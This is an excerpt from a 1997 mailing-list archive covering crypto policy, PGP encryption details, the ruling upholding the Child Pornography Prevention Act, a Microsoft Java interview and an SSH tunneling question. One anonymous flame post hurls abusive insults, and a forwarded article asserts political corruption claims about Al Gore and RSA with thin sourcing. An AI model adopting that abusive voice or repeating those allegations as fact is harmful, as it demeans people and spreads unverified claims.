iQCVAwUBM/NfhoVO4r4sgSPhAQG8XQP8DfOeKWDInfWuXvsEEALGXJnbq+TQSnCX IJpYgeH87AyOYGq2wu61RVbO62/MQxCdhhn07y0xKJzqbHpP0YRvQawrirkUwYYv CfKeZMnZGnI/uPp3g2VA7KfcXyTP91YFfZ90GtDjs1cmmSE+0zFI4w1ht4UJPBzn JUqo72HE0/c= =XdDT -----END PGP SIGNATURE----- From gbroiles at netbox.com Thu Aug 14 13:47:16 1997 From: gbroiles at netbox.com (Greg Broiles) Date: Fri, 15 Aug 1997 04:47:16 +0800 Subject: Ruling in child porn 1st amendment challenge Message-ID: <3.0.3.32.19970814133846.009ff700@mail.io.com> I've placed a copy of Judge Conti's ruling in _Free Speech Coalition v. Reno_, the case challenging the Child Pornography Prevention Act on First Amendment grounds, on the web at: . -- Greg Broiles | US crypto export control policy in a nutshell: gbroiles at netbox.com | http://www.io.com/~gbroiles | Export jobs, not crypto. From declan at well.com Thu Aug 14 13:47:42 1997 From: declan at well.com (Declan McCullagh) Date: Fri, 15 Aug 1997 04:47:42 +0800 Subject: Not enough phone competition? Answer: regulate more! Message-ID: By JEANNINE AVERSA

Associated Press Writer

WASHINGTON (AP) - Just 18 months after Congress deregulated the communications industry, the nation's top telephone regulator asked lawmakers Thursday for more tools to bring Americans local phone competition. "So far, scarcely any local competition has been delivered to residential or business consumers," Federal Communications Commission Chairman Reed Hundt said in a speech to the American Enterprise Institute. "We have a major challenge to introduce competition in the local telephone markets and that challenge is not yet being met," he said. Hundt asked Congress to write into law provisions: -Giving the FCC authority to set national pricing rules for those seeking access to local phone networks. -Requiring courts to defer to reasonable FCC judgments in disputes over the telecommunications law. -Consolidating appeals over the telecommunications law and FCC rules before a single unspecified court. -Creating a national policy to enforce the telecommunications law, giving the FCC power to compensate injured parties. The FCC now can order violators to stop breaking the law and fine offenders. Congressional hearings into the slow pace of local phone competition are slated for this fall. Sen. John McCain, R-Ariz., chairman of the Commerce Committee that oversees telecommunications policy, said when asked about the proposals, "I do not think that giving the FCC more authority to regulate is the answer." [...] From nospam-seesignature at ceddec.com Thu Aug 14 14:12:19 1997 From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com) Date: Fri, 15 Aug 1997 05:12:19 +0800 Subject: Encrypting same data with many keys... In-Reply-To: Message-ID: <97Aug14.165930edt.32260@brickwall.ceddec.com> On Wed, 13 Aug 1997, Ray Arachelian wrote: > On Wed, 13 Aug 1997, Bill Stewart wrote: > > > The actual data is encrypted with IDEA, but the identical IDEA key is > > encrypted with each recipient's RSA key. To avoid this attack, > > PGP uses random padding after the IDEA key (which makes the message > > encrypted with RSA different for each recipient, avoiding the trap. > > Since IDEA keys are 128 bits long, and RSA moduli are typically 384-2047, > > there's plenty of room for random noise in the format.) > > Would it not be more secure if it picked a different IDEA session key for > each recipient? Would be slower, but... If there were random padding, I don't think it would increase the security. PGP uses one conventional key and multiple PK encryptions of it, with different padding (I think). Then you only have one message to send out, i.e. pk1,pk2...pkn,convenc instead of pk1,cenc1 pk2,cenc2... --- reply to tzeruch - at - ceddec - dot - com --- From vznuri at netcom.com Thu Aug 14 14:49:36 1997 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Fri, 15 Aug 1997 05:49:36 +0800 Subject: RSA shaken down for cash? Message-ID: <199708142135.OAA23073@netcom7.netcom.com> ------- Forwarded Message Date: Thu, 14 Aug 1997 10:51:56 -0400 From: Kris Millegan RoadsEnd Subject: CTRL-Softwar To: CTRL at LISTSERV.AOL.COM from:http://www.aci.net/kalliste/ The Home Page of J. Orlin Grabbe - ------ VP Gore Strong-Arms Crypto Company, then Demands Donation Between 1995 and 1996 Al Gore called 44 people from the White house to solicit money for his re-election. Those calls netted the DNC over $2 million dollars. The Vice President placed these calls from the White House on his DNC credit card. One person Mr. Gore called was Sandford Robertson, part owner of the San Francisco investment banking firm Robertson, Stephens and Co. The Vice President's call obtained $142,000 from "Sandy" Robertson for the DNC. Yet, Sandy was already well known in the DNC camp. Between 1993 and 1997, Sandy Robertson or his wife donated over $700,000 to various campaigns, including $100,000 for Clinton's 1993 inauguration. Robertson, Stephens and Co. are also major financial backers of Security Dynamics, the present owners of RSA Inc. It was Robertson, Stephens and Co. that filed the agreement documents with the SEC (Security and Exchange Commission) for the merger of RSA and Security Dynamics in April of 1996. Of course, Robertson, Stephens and Co. were well paid to sponsor the RSA/SDI merger deal. Robertson and Stephens not only wrote the merger agreement between RSA and SDI they also underwrote the first two public offerings of SDI stock. "Robertson, Stephens & Company has provided certain investment banking services to Security Dynamics from time to time, including acting as an underwriter for each of the two public offerings of shares of the common stock of Security Dynamics. In addition, Robertson, Stephens & Company maintains a market in shares of the common stock of Security Dynamics. Furthermore, Robertson, Stephens & Company has acted as financial advisor to Security Dynamics in connection with the Merger for which a portion of our fees is due and payable upon delivery of this opinion and the remaining portion of our fees is due and payable contingent upon the closing of the Merger." SEC Merger Document April, 1996 ROBERTSON, STEPHENS & COMPANY LLC Edwin David Hertz Jim Bidzos, RSA chairman, stated that Al Gore personally lobbied him to sell the RSA crypto patents to the US Government. It is reported that Al failed and Bidzos walked out. Al Gore has never denied nor confirmed Mr. Bidzos's remarks about his effort on behalf of the US government. Yet, Jim Bidzos also took a trip to Beijing in late 1995. The result of that trip was second trip to Beijing in February of 1996 and a deal with the Academy of Science to sell encryption technology directly to the PRC government. The Clinton administration, quick to prosecute anyone who sold encryption outside the US, did nothing to stop the RSA deal with China. Al Gore tried to buy the rights to encryption technology from RSA for the US government. That was an official act performed by the Vice President. Al Gore has also played a major role in the Clinton Administration's Crypto policy. He was fully briefed early on about Clipper and later would lobby hard to push the draconian controls sought by the government. Yet, despite the obvious conflict of interest, Al Gore did not hesitate to solicit donations from the very same company he had just tried to strong-arm. Al dialed for money from the same company that needed the administration's approval for export. In the end... Money was exchanged and services were rendered. China now has the RSA crypto technology, Al Gore got the donation money and "Sandy" Robertson stands to become even richer. 1 if by land, 2 if by sea. Paul Revere - encryption 1775 Charles R. Smith SOFTWAR - ----- Aloha, He'Ping Om, Shalom, Salaam. Peace Be, Amen. Roads End Kris ------- End of Forwarded Message From declan at well.com Thu Aug 14 14:53:57 1997 From: declan at well.com (Declan McCullagh) Date: Fri, 15 Aug 1997 05:53:57 +0800 Subject: "Morphed" child porn case ruling text (FSC v. Reno) Message-ID: [My report is at: http://pathfinder.com/netly/opinion/0,1042,1287,00.html --Declan] UNITED STATES DISTRICT COURT NORTHERN DISTRICT OF CALIFORNIA THE FREE SPEECH COALITION, et al., Plaintiffs, v. JANET RENO, et al., Defendants. No. C 97-0281 SC ORDER RE MOTIONS FOR SUMMARY JUDGMENT FILED AUG 12 1997, Richard W. Wieking, Clerk, U.S. District Court, Northern District of California I. INTRODUCTION Plaintiffs in this action consist of a trade association that defends First Amendment rights against censorship, the publisher of a book "dedicated to the education and expression of the ideals and philosophy associated with nudism," and individual artists whose works include nude and erotic photographs and paintings. Plaintiffs have filed a pre-enforcement challenge to the constitutionality of certain provisions of the Child Pornography Prevention Act of 1996 ("CPPA"), alleging that they are vague, overbroad, and constitute impermissible content-specific regulations and prior restraints on free speech. Both plaintiffs and defendants have moved for summary judgment. II. BACKGROUND Congress has passed several laws(1) in an ongoing attempt to combat child pornography, the market that such pornography has created and maintained, and the harms that such pornography wreaks on children's physical, psychological, emotional, and mental health. S. Rep. No. 104-358, at 8 (1996) ("Sen. Rep."). The most recent of these laws was passed in 1996, and was enacted specifically to combat the use of computer technology to produce pornography that conveys the impression that children were used in the photographs or images. In passing the legislation, Congress recognized that the dangers of child pornography are not limited to its effect on the children actually used in the pornography. Additionally, child pornography "stimulates the sexual appetites and encourages the activities of child molesters and pedophiles, who use it to feed their sexual fantasies." Sen. Rep. At 12. Child pornography is also used by child molesters and pedophiles "as a device to break down the resistance and inhibitions of their victims or targets of molestation, especially when these are children." Id. at 13. "A child who may be reluctant to engage in sexual activity with an adult, or to pose for sexually explicit photos, can sometimes be persuaded to do so by viewing depictions of other children participating in such activity." Id. Congress recognized that computer technology is capable of "alter[ing] perfectly innocent pictures of children. . . to create visual depictions of those children engaging in any imaginable form of sexual conduct." Id. at 15. These computer-generated pictures are often indistinguishable from photographic images of actual children. "Computer generated images which appear to depict minors engaging in sexually explicit conduct are just as dangerous to the well-being of. . . children as material using actual children." Id. at 19. Thus, Congress passed the 1996 Act in order to prevent the effects that such computer-generated images might have, even if no children were actually used in the creation of the images. Specifically, the CPPA defines child pornography as: any visual depiction, including any photograph, film, video, picture, or computer or computer-generated image or picture, whether made or produced by electronic, mechanical, or other means, of sexually explicit conduct, where -- (A) the production of such visual depiction involves the use of a minor engaging in sexually explicit conduct; (B) such visual depiction is, or appears to be, of a minor engaging in sexually explicit conduct; (C) such visual depiction has been created, adapted, or modified to appear that such an identifiable minor is engaging in sexually explicit conduct; or (D) such visual depiction is advertised, promoted, presented, described, or distributed in such a manner that conveys the impression that the material is or contains a visual depiction of a minor engaging in sexually explicit conduct. . . . 18 U.S.C. 2256(8). The CPPA goes on the define "sexually explicit conduct" as actual or simulated: (A) sexual intercourse, including genital-genital, oral-genital, anal-genital, or oral-anal, whether between persons of the same or opposite sex; (B) bestiality; (C) masturbation; (D) sadistic or masochistic abuse; or (E) lascivious exhibition of the genitals or pubic area of any person. 18 U.S.C. 2256(2). The CPPA also provides an affirmative defense for violations of the Act if: (1) the alleged child pornography was produced using an actual person or persons engaging in sexually explicit conduct; (2) each such person was an adult at the time the material was produced; and (3) the defendant did not advertise, promote, present, describe, or distribute the material in such a manner as to convey the impression that it is or contains a visual depiction of a minor engaging in sexually explicit conduct. 18 U.S.C. 2252A(c). Plaintiffs contend that the CPPA "sweeps within its purview materials that involve no actual children and that traditionally and logically have never been considered to be child pornography." Pls.' Mem in Supp. Of Mot. For Summ. Judg. at 3. They argue that the CPPA, by prohibiting images that appear to be of children, actually criminalizes the production and sale of legitimate works that include images that look like children, but that in reality were made using adults, not children. They allege that the CPPA's "use of overbroad and vague language criminalizes forms of expression in violation of the First and Fifth Amendments." Pls.' Mem. in Supp. of Mot. for Summ. Judg. at 4. III. LEGAL ANALYSIS A. Standing Defendants first argue that plaintiffs do not have standing to bring a claim in this Court, as they have not suffered "actual or threatened injury as a result of the putatively illegal conduct of the defendant." Valley Forge Christian College v. Americans United for Separation of Church and State, Inc., 454 U.S. 464, 472 (1982). Defendants contend that plaintiffs' activities fall squarely within the affirmative defense set out in 18 U.S.C. 2252A(c), as plaintiffs have admitted that their works involve the depiction only of non-minors(2) and that they do not market their works as child pornography.(3) Plaintiffs counter that they have indeed been injured by the CPPA, as plaintiffs have, in some cases, discontinued the production, distribution, and possession of the certain materials for fear of prosecution under the CPPA. The CPPA, therefore, has had a chilling effect on their speech which is sufficient to constitute standing. See, e.g., San Diego County Gun Rights Committee v. Reno, 98 F.3d 1121, 1129 (9th Cir. 1996)(holding that a chilling effect on speech is a sufficient basis to establish standing in overbreadth facial challenges to government actions involving free speech); Stoianoff v. Montana, 695 F.2d 1214, 1223 (9th Cir. 1983). Furthermore, plaintiffs contend that they have standing to bring their suit because the affirmative defense set out in 18 U.S.C. 2252A(c) does not protect consumers and distributors who possess the potentially illegal materials but who are not involved in the production of sexually explicit materials, and who therefore have no way of knowing whether or not the persons depicted are real and are not minors. Plaintiffs have set forth affidavits of businesses and individuals engaged in distributing, selling, or renting sexually explicit materials who have withheld or stopped distributing certain of plaintiffs' products that plaintiffs argue should fit within the statutory defense, out of fear that they will be prosecuted under the CPPA for possession of the materials. Plaintiffs are no longer marketing or sending those products to its distributors. See Virginia v. Am. Booksellers Ass'n., Inc., 484 U.S. 383, 393 (1988)(harm resulting from speech regulation may be one of self-censorship). The Court finds that plaintiffs' allegations are sufficient to establish the requisite standing to bring their claims before the Court. B. Standard of Review In evaluating the constitutionality of legislation that infringes free speech under the First Amendment, the Supreme Court has identified the appropriate criteria by which the language of the act and the purposes underlying the passage of the act shall be judged. "[T]he government may impose reasonable restrictions on the time, place, or manner of protected speech, provided the restrictions are justified without reference to the content of the regulated speech, that they are narrowly tailored to serve a significant governmental interest, and that they leave open ample alternative channels for communication of the information." Ward v. Rock Against Racism, 491 U.S. 781, 791, reh'g denied, 492 U.S. 937 (1989)(internal quotations omitted). In order to determine whether a regulation is content-neutral, "the principal inquiry. . . is whether the government has adopted a regulation of speech because of disagreement with the message it conveys." Id. A "regulation that serves purposes unrelated to the content of expression is deemed neutral, even if it has an incidental effect on some speakers or messages but not others." Id.; see also City of Renton v. Playtime Theaters, Inc., 475 U.S. 41, 47-48, reh'g denied 475 U.S. 1132 (1986)(upholding ordinance prohibiting adult motion picture theaters within 1,000 feet of residential zones, churches, parks, or schools on basis that regulation was content-neutral because it was aimed at the secondary effects of such theaters on the surrounding community). If it can be shown that the regulation is justified without reference to the content of the speech, then it is deemed content-neutral. Renton, 475 U.S. at 48. The contested provisions of the CPPA are content-neutral regulations. They have clearly been passed in order to prevent the secondary effects of the child pornography industry, including the exploitation and degradation of children and the encouragement of pedophilia and molestation of children. Furthermore, the Supreme Court has afforded "greater leeway" to regulations of child pornography. New York v. Ferber, 458 U.S. 747, 756 (1982). The Supreme Court has "sustained legislation aimed at protecting the physical and well-being of youth even when the laws have operated in the sensitive area of constitutionally protected rights." Id. at 757. Given the nature of the evils that anti-child pornography laws are intended to prevent, the CPPA can easily be deemed a content-neutral regulation. For even if no children are involved in the production of sexually explicit materials, the devastating secondary effect that such materials have on society and the well-being of children merits the regulation of such images. Plaintiffs' contention that the CPPA is content-specific is unpersuasive. They claim that the terms of the CPPA clearly target materials that convey certain ideas to their viewers. The Court finds that the CPPA is designed to counteract the effect that such materials has on its viewers, on children, and to society as a whole, and is not intended to regulate or outlaw the ideas themselves. If child pornography is targeted by the regulation, it is due to the effect of the pornography on innocent children, not to the nature of the materials themselves, especially if that pornography contains computer-generated images of children. See, e.g., Am. Library Ass'n v. Reno, 33 F.3d 78, 86 (D.C. Cir. 1994)(legislation requiring producers of sexually explicit material to document the names and ages of the persons portrayed was content-neutral, as it was intended "not to regulate the content of sexually explicit materials, but to protect children by deterring the production and distribution of child pornography"); Chesapeake B&M Inc., v. Hartford County, 58 F.3d 1005, 1010 (4th Cir.), cert denied, 116 S.Ct. 567 (1995). According to the Supreme Court, "[a] content-neutral regulation will be sustained under the First Amendment if it advances important governmental interests unrelated to the suppression of free speech and does not burden substantially more speech than necessary to further those interests." Turner Broadcasting Sys., Inc. v. Fed. Communications Comm'n, 117 S.Ct. 1174, 1186 (1997). The CPPA clearly advances important and compelling government interests: the protection of children from the harms brought on by child pornography and the industry that such pornography has created. It is beyond debate that the protection of children from sexual exploitation is an important governmental interest; indeed, the Supreme Court has deemed the protection of the physical and psychological well-being of minors to be a "compelling" interest. Ferber, 458 U.S. at 756-7; see also Sen. Rep. At 9 (There is a "compelling governmental interest [in prohibiting] all forms of child pornography.") Furthermore, the CPPA burdens no more speech than necessary in order to protect children from the harms of child pornography. As stated aforesaid, the CPPA specifically defines "sexually explicit conduct" as "sexual intercourse, including genital-genital, oral-genital, anal-genital, or oral-anal, whether between persons of the same or opposite sex; bestiality; masturbation; sadistic or masochistic abuse; or lascivious exhibition of the genitals or pubic area of any person." 18 U.S.C. 2256(2). It also defines "child pornography" as any visual depiction of sexually explicit conduct where the production involves the actual use of minors engaging in such conduct, the depiction is or appears to be of a minor engaging in such conduct, the depiction has been created, adapted, or modified to appear that a minor is engaging in such conduct, or the depiction is advertised, presented or promoted in such a way as to convey the impression that minor is engaging in such conduct. 18 U.S.C. 2256(8). Although there may be a degree of ambiguity in the phrase "appears to be a minor," any ambiguity regarding whether a particular person depicted in a particular work appears to be over the age of eighteen can be resolved by examining whether the work was marketed and advertised as child pornography. Given that the goal of the CPPA is to prevent the digital manipulation of images to create child pornography even when no children were actually used in the production of the material, the CPPA meets that goal by regulating the narrowest range of materials that might fall within the targeted category and including an explicit definition of the prohibited conduct. Congress certainly intended to exclude from the CPPA's reach materials that do not involve the actual or apparent depiction of children: "[The CPPA] does not, and is not intended to, apply to a depiction produced using adults engaging in sexually explicit conduct, even where a depicted individual may appear to be a minor." Sen. Rep. At 21. The affirmative defense laid out in 18 U.S.C. 2252A(c) limits even further the scope of the CPPA by removing from the range of criminal behavior the exact type of activity in which plaintiffs claim to engage. Plaintiffs contend that their works do not involve actual children, and that their works are not marketed or advertised as works featuring sexually explicit conduct by children. Their behavior, then, falls squarely within the category specifically set out by Congress as beyond the scope of the CPPA. The Court finds that the incidental harms laid out by the plaintiffs as support for their assertion of standing in this action do not amount to the CPPA's regulating "substantially more speech than necessary to further" the goal of preventing the dangers of child molestation and pedophilia.(4) See Pls.' Opp. to Defs.' Mot. for Summ. Judg. at 7-8. Although the effects of a content-neutral speech regulation may be substantial, if they are incidental and largely unavoidable, they will pass constitutional muster. Am. Library Ass'n. v. Reno, 33 F.3d at 87-8. Also, "[t]he mere assertion of some possible self-censorship resulting from a statute is not enough to render an antiobscenity law unconstitutional." Fort Wayne Books, Inc. v. Indiana 489 U.S. 46, 60 (1989). The contested provisions of the CPPA survive the intermediate scrutiny set forth by the Supreme Court for content-neutral regulations. The instant case is quite similar to that which the Supreme Court confronted in New York v. Ferber, 458 U.S. 747 (1982). In Ferber, the Court upheld a New York statute that prohibited person from knowingly promoting a sexual performance by a child under the age of 16 by distributing material which depicts such a performance. The Court concluded that the statute did not violate the First Amendment. According to the Court, the unprotected nature of the works involved permitted the state to prohibit the particular category of works from distribution, especially given the compelling state interest in protecting children from the harms of child pornography. 458 U.S. at 765. The final inquiry this Court must make is whether the regulations leave open alternative channels for communication of the information at issue. Defendants contend that "plaintiffs are free to communicate any substantive message they desire, through any medium they desire, as long as they are not depicting actual or computer-generated children engaged in sexually explicit conduct." Defs.' Mem. In Supp. of Mot. for Summ. Judg. at 20. The Court finds this argument persuasive. Because plaintiffs allege that their materials are not produced using minor children, and that they do not market their materials so as to suggest that they are child pornography or to exploit the sexual qualities of the work as child pornography, plaintiffs should have no trouble conforming their activities to fit within the confines of the text of the CPPA or to escape the reach of the law altogether. C. Overbreadth and Vagueness Plaintiffs contend that the CPPA is unconstitutionally overbroad and vague. First, regulations that prohibit constitutionally protected speech as well as activity that can legitimately be prohibited are considered to be overbroad. Thornhill v. Alabama, 310 U.S. 88, 97 (1940). Plaintiffs base their overbreadth argument on the assertion that the CPPA "impermissibly suppresses material that is protected under the First Amendment" by defining child pornography as including visual depictions of adults that appear to be minors. Pls.' Mem. In Supp. of Mot. for Summ. Judg. at 12. In doing so, plaintiffs argue, the CPPA "bans a wide array of sexually-explicit, non-obscene material that has serious literary, artistic, political, and scientific value." Pls.' Mem. in Supp. of Mot. for Summ. Judg. at 13. Finally, plaintiffs cite the Supreme Court's recent ruling in Reno v. ACLU that the governmental interest in protecting children "does not justify an unnecessarily broad suppression of speech addressed to adults." 1997 U.S. LEXIS 4037 at *54 (striking as unconstitutional two provisions of the Communications Decency Act of 1996 that prevent the transmission of "indecent" and "patently offensive" materials over the Internet). The Court finds that the CPPA is not overbroad. It specifies that only materials that do not use adults and that appear to be child pornography, even if they are digitally produced, are prohibited. By plaintiffs' own admission, plaintiffs' products do not fall into these categories and are also exempt under the CPPA's affirmative defense provisions. It is highly unlikely that the types of valuable works plaintiffs fear will be outlawed under the CPPA -- depictions used by the medical profession to treat adolescent disorders, adaptations of sexual works like "Romeo and Juliet," and artistically-valued drawings and sketches of young adults engaging in passionate behavior -- will be treated as "criminal contraband." As long as a work does not depict children, or what appears to be children, engaged in sexually explicit conduct as defined by the statute, and the work is not marketed as child pornography or in such a way that exploits its sexual nature as child pornography, then there is no likelihood that the work will be prohibited by the CPPA. The CPPA is not overbroad because it prohibits only those works necessary to prevent the secondary pernicious effects of child pornography from reaching minors. Plaintiffs contend that the CPPA is also unconstitutionally vague because it does not give a person of ordinary intelligence a reasonable opportunity to know what is prohibited so that he may act accordingly. Grayned v. City of Rockford 408 U.S. 104, 108 (1972). However, the CPPA does exactly what the Supreme Court has required of child pornography legislation as set out in Ferber: it must (1) adequately define the prohibited conduct; (2) be limited to visual depictions of children below a specific age; and (3) suitably limit and describe the category of forbidden "sexual conduct." 458 U.S. at 764. The CPPA clearly and specifically defines the prohibited conduct as the depiction of children engaged in sexually explicit conduct. It is limited to visual depictions of minors, but simply redefines the term "depiction" to include images of children that were produced using computers or other artificial means. Finally, it suitably limits and describes the category of forbidden conduct. As long as the person portrayed in the work is an adult, and the work is not marketed or advertised as child pornography and does not convey the impression that it is child pornography, then the CPPA's affirmative defense applies and removes the work from the scope of its provisions. The Court finds that the CPPA is not unconstitutionally vague, as it gives sufficient guidance to a person of reasonable intelligence as to what it prohibits.(5) D. Prior Restraint Plaintiffs contend that the CPPA imposes a prior restraint on speech by enacting a complete ban on material that contains sexually-explicit depictions of adults who appear to be minors and by chilling the expression of "artists, photographers, film makers, publishers, and merchants" by preventing them from disseminating such depictions. Plaintiffs also contend that the CPPA places unbridled discretion in the hands of government officials and deals an unnecessarily severe punishment for an incorrect determination of whether or not an adult appears to be a minor. The Court agrees with defendants that the CPPA neither completely bans depictions of adults who appear to be minors nor punishes producers or distributors who create works in which adults appear who might be mistaken as minors. Indeed, the affirmative defense laid out in 18 U.S.C. 2252A(c) clearly permits the use of adults, even if they look like minors, as long as the works in which they appear are not marketed as child pornography. In addition "[n]o government official is vested with authority to permit or deny plaintiffs the right to produce these works, and thus the [CPPA] imposes no unconstitutional prior restraint on speech." Defs.' Opp. to Pls.' Mot. for Summ. Judg. at 17-18. The CPPA represents no more of a prior restraint on speech than the New York statute at issue in Ferber, and the CPPA comes within the rationale of the Supreme Court's holding in that case. Because the CPPA does not require advance approval for production or distribution of adult pornography that does not use minors, and does not effect a complete ban on constitutionally protected material, it does not constitute an improper prior restraint on speech. IV. CONCLUSION Therefore, this court finds that the CPPA meets constitutional standards and is therefore constitutional as written. For the foregoing reasons, plaintiffs' motion for summary judgment is hereby DENIED. Defendant's motion for judgment on the pleadings is GRANTED. IT IS SO ORDERED. Dated: August 12, 1997. /s/ Samuel Conti United States District Judge --- 1 See Am. Library Ass'n v. Barr 956 F.2d 1178, 1181-85 (D.C. Cir. 1992) for a discussion of the history of national anti-child pornography legislation. 2 Pls.' Opp. to Defs.' Mot. for Summ. Judg. at 1. 3 Defendants also contend that plaintiffs lack standing because, in their complaint, plaintiffs allege that they do not produce the type of "hard-core" sexual images that would be subject to regulation by the CPPA. As a result, defendants argue, plaintiffs cannot demonstrate a real and immediate threat of injury and therefore cannot bring this claim. See Barr, 956 F.2d at 1187. The Court rejects this argument. The parameters of pornography are difficult to define, and dismissing plaintiffs' claims for lack of standing is not appropriate in this case, given the variety of the plaintiffs' products. 4 These incidental harms include the depiction of images created within the imagination of the artist. If the images depicted are of children, albeit imaginary ones, and not of actual adults or imaginary people who unequivocally appear to be adults, then the evils associated with child pornography cannot be avoided. 5 For examples of other cases that have upheld similarly worded child pornography statutes against vagueness challenges, see, e.g., U.S. v. Smith, 795 F.2d 841 (9th Cir. 1986), cert. denied, 481 U.S. 1032 (1987); U.S. v. Lamb, 945 F. Supp. 441 (N.D.N.Y. 1996). ------------------------- Declan McCullagh Time Inc. The Netly News Network Washington Correspondent http://netlynews.com/ From cyber at ibpinc.com Thu Aug 14 15:32:29 1997 From: cyber at ibpinc.com (Roger J Jones) Date: Fri, 15 Aug 1997 06:32:29 +0800 Subject: Private Idaho source Message-ID: <01BCA8D4.BA1B3690@PC1901> If anyone has been successful in downloading the source code and or knows how to make the 32 bit release work with Windows NT 4.0 please either mail to me or give me a good FTP or URL address. Thanks From declan at well.com Thu Aug 14 15:58:07 1997 From: declan at well.com (Declan McCullagh) Date: Fri, 15 Aug 1997 06:58:07 +0800 Subject: McVeigh on McVeigh Message-ID: The letter convicted Oklahoma City bomber Timothy McVeigh sent to U.S. District Judge Richard Matsch, released Thursday: June 22, 1997 Dear Judge Matsch, I am writing to you with the understanding that you are responsible for assigning my appellate attorneys. It has been represented to me that you are aware of the problems and difficulties I have had with my appointed counsel in the past. With this letter I do not waive anything with respect to those concerns - but if I have any voice in who represents me on appeal, I would prefer Richard Burr, Randall Coyne, and Robert Nigh, Jr. If Stephen Jones must be appointed, I would at least request that Richard Burr and Robert Nigh, Jr. be appointed as co-appellate counsel and that Randall Coyne be authorized to assist Richard Burr. Thank you for your time. Timothy J. McVeigh APTV-08-14-97 1833EDT From dlv at bwalk.dm.com Thu Aug 14 16:26:11 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 15 Aug 1997 07:26:11 +0800 Subject: Remailer hating Nazis (was Re: The BIG Lie (Jesus Confesses)) In-Reply-To: <9E157oQnntYqhiv6vHV2+w==@JawJaCrakR> Message-ID: Anonymous writes: > > The remailer hating Nazi called Patrick Oonk wrote: > >At least I don't hide behind a remailer. > > There's no cowardice to it, dumbass. Our founding fathers and others wrote t If you don't like remailers, FUCK YOU. > > If so, then burn in hell, Nazi scum-sucking weasel! > Ditto for Paul Pomes and Gary Burnore. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From nobody at REPLAY.COM Thu Aug 14 16:29:50 1997 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 15 Aug 1997 07:29:50 +0800 Subject: Hypothetical situation for networks In-Reply-To: Message-ID: <199708142312.BAA09035@basement.replay.com> On Thu, 14 Aug 1997, Ray Arachelian wrote: > > OS doesn't really matter, as it is a hypothetical system, but we'll assume > > either some form of unix/linux, or perhaps winNT or novell NetWare. > > Can NFS under solaris or linux be tunneled through SSH? That would seem > feasable (that is if you can get SSH to tunnel a UDP...) I think SSH will not tunnel UDP, and TCP NFS for Linux and Solaris (?) is not reliable. I would lean towards SSH in rcp-style mode: for a continent-wide link you will probably find the performance of batch-style transfers more enjoyable than that of a remote file system system. SSH also very neatly lets you run remote commands and so on. (Enough, already...) > If not, you > could use microsoft's PPTP, but I wouldn't trust its cyphers. Don't touch it. ::Boots From nobody at REPLAY.COM Thu Aug 14 16:29:51 1997 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 15 Aug 1997 07:29:51 +0800 Subject: Microsoft and Java Message-ID: <199708142315.BAA09320@basement.replay.com> ::Boots ------------ http://www.computerworld.com/news/970730javah.html The Paul Maritz interview that article links to has disappeared from Computerworld's site, but a copy is appended. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Formerly at http://www.computerworld.com/news/news_articles/970728moritz.html Microsoft Corp. last week indicated that it would essentially block efforts to make Java a cross-platform development language, stating that it wouldn't ship Sun Microsystems, Inc.'s Java Foundation Class Libraries (JFC). Computerworld senior editor Carol Sliwa caught up with Paul Maritz, Microsoft group vice president, at a company reception in Seattle and asked him to explain the software giant's Java stance. CW: There's nothing in the license that requires you to ship those JFCs with Internet Explorer? Maritz: Correct. CW: Is that a contentious issue? Maritz: No. The only reason I brought it up is just that some people like to play hard and fast with the truth, and they like to say, 'Look, these JFC class libraries are going to be a standard because everybody has to ship them. Even Microsoft has to ship them.' And that's not the case. We were very careful when we did the deal to say that we could have the option of shipping them, but we do not have to include them in Windows. CW: Is there some reason you wouldn't want to ship them? Is there something inferior about them? Maritz: No. We don't want to put further bloat on top of the system. We think that basically there isn't a lot of end-user value in them. And Sun's trying to establish them as basically their platform. It's a competing operating system. CW: Do you feel your Application Foundation Class Libraries (AFC) are superior to their JFCs? Maritz: No. AFCs ... make it easier to write apps. But our real strategy is J/Direct. So our answer to JFC is not AFC. It's J/Direct. CW: It sounds like Microsoft is resentful at Sun for taking a dictatorial role. Maritz: The reason we brought it up is Sun likes to blur these two things together. They like to blur the notion of Java the language and Java the class libraries. They'd like to package them all into that concept. We're just saying, 'Hey, there is a difference between the two. Let's be clear on that.' " CW: Do you think you're going to end up fragmenting the language even more? Maritz: Not the language. You're making the mistake. You're falling into their mind-set -- [ignoring] the difference between Java the language from Java the class libraries. CW: But in the end result, a network manager will have to make sure he has both sets of class libraries. Maritz: Let me ask you this question: The fact that you can call Windows [application programming interfaces] from C++, did that splinter C++? It did not. It's the same issue. CW: But if Java's promise is that it'll be a cross-platform language -- Maritz: No. No. Sun's trying to make it that. CW: But say there's an electronic-commerce application that somebody wants to run cross-platform, and that's why they picked Java. And they use the JFCs to write it. Maritz: Good luck. CW: It's not going to run in Internet Explorer. Maritz: It may or may not. But the point is, that's Sun's problem. It's not our problem. CW: Does it end up being companies' problems, too? Are you saying they're foolish for buying into the theory that there can ever be cross-platform language? Maritz: No. We're saying it's no different from any other cross-platform [strategy]. This isn't the first one -- [there was] CBT, Appware, etc. We're just saying that, 'Hey, you should realize that when you're doing that, you're dependent upon Sun to get it to work.' CW: But if you bought into the JFCs, then you wouldn't be in this particular case. If you shipped JFCs, you'd help foster the idea of cross-platform. Maritz: And I don't want to ship another operating system on top of our operating system and burden every copy of Windows with all of that extra weight. CW: Do you agree that it makes developers have to make choices and it makes them have to do more work and it makes companies have to install both sets of classes? So in the end, it makes life difficult for everyone, doesn't it? Maritz: But we think that that's reality, because you either get this thing to become a heavyweight thing, in which case it's going to perform badly. Or you have to make it something very small. So we're not trying to be parties to perpetuating the myth. From dlv at bwalk.dm.com Thu Aug 14 16:30:28 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 15 Aug 1997 07:30:28 +0800 Subject: Toilet plungers and sodomy: Why we should trust police blindly In-Reply-To: Message-ID: <031FBe4w165w@bwalk.dm.com> Ray Arachelian writes: > This is really Guiliani's fault for hiring so many damn cops. NYC now has > so many cops that if you walk down the street in most neighborhoods for > more than 5 minutes you'll see at least one cop car. In their rush to > hire cops, they also hired scum as cops. Who knows how many such > incidents go unreported or are covered up. :( 